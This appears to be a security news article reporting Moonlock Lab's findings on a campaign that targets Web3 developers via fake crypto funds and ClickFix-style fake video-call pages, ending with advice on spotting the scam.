Analysts from Moonlock Lab have uncovered a large-scale attack on Web3 developers and crypto specialists. The hackers disguise themselves as venture investors and find their victims on LinkedIn.

The perpetrators praise the specialists' projects and propose collaboration. They then send links to fake video conferences that infect computers with malware.

The Illusion of a Legitimate Business

The attackers have created three fictitious crypto funds: SolidBit Capital, MegaBit, and Lumax Capital. The websites of these organizations appear credible, featuring corporate histories, investment portfolios, and lists of executives. The images of the staff were generated by neural networks.

Source: Moonlock Lab.

The scammers contact specialists using fake accounts, posing as top managers of these funds. The conversation begins with compliments about the victim's professional achievements.

Infection via ClickFix

The hackers quickly move the conversation to messaging apps and invite the victim to a video call. The victim receives a link to a Calendly service. This address redirects the user to an exact copy of the Zoom, Google Meet, or another similar service's website.

A Cloudflare verification window pops up on the screen. The system asks the user to check a box to confirm they are not a robot. This is a hacker technique known as ClickFix.

Clicking the button discreetly copies malicious code to the clipboard. The site displays an animated instruction with a timer, prompting the user to open the system terminal, paste the copied text, and press Enter.

The code automatically detects the operating system:

  • On Windows, a hidden process is launched directly in memory. The virus does not save files to the hard drive, allowing it to bypass security systems;
  • On macOS, the script checks for Python, silently downloads the necessary libraries, and embeds itself in the system.
Source: Moonlock Lab.

In some cases, hackers sent victims an application that completely mimics the interface of real Zoom on Mac. The program simulates a login window, collects passwords, and sends them to the scammers' Telegram bot.

Links to North Korean Hackers

The addresses of the fake websites are registered in the name of Anatoly Bigdash from Boston, USA. Experts doubt the existence of this person.

Source: Moonlock Lab.

Researchers noted similarities in tactics with the methods used by the UNC1069 group. This team has been hacking crypto projects since 2018. Analysts from Mandiant have previously linked it to North Korea. The criminals use identical structures for malicious links and similar deception scenarios through fake video calls.

To protect against attacks, specialists recommend checking the registration dates of the domains of your contacts. Legitimate services never ask users to enter commands in the terminal to verify identity or start a broadcast. The deception can often be recognized at the stage of clicking on external links.

Recall that in June 2025, Mehdi Farouk, an investment partner at the venture firm Hypersphere, fell victim to a phishing attack through a fake Zoom call.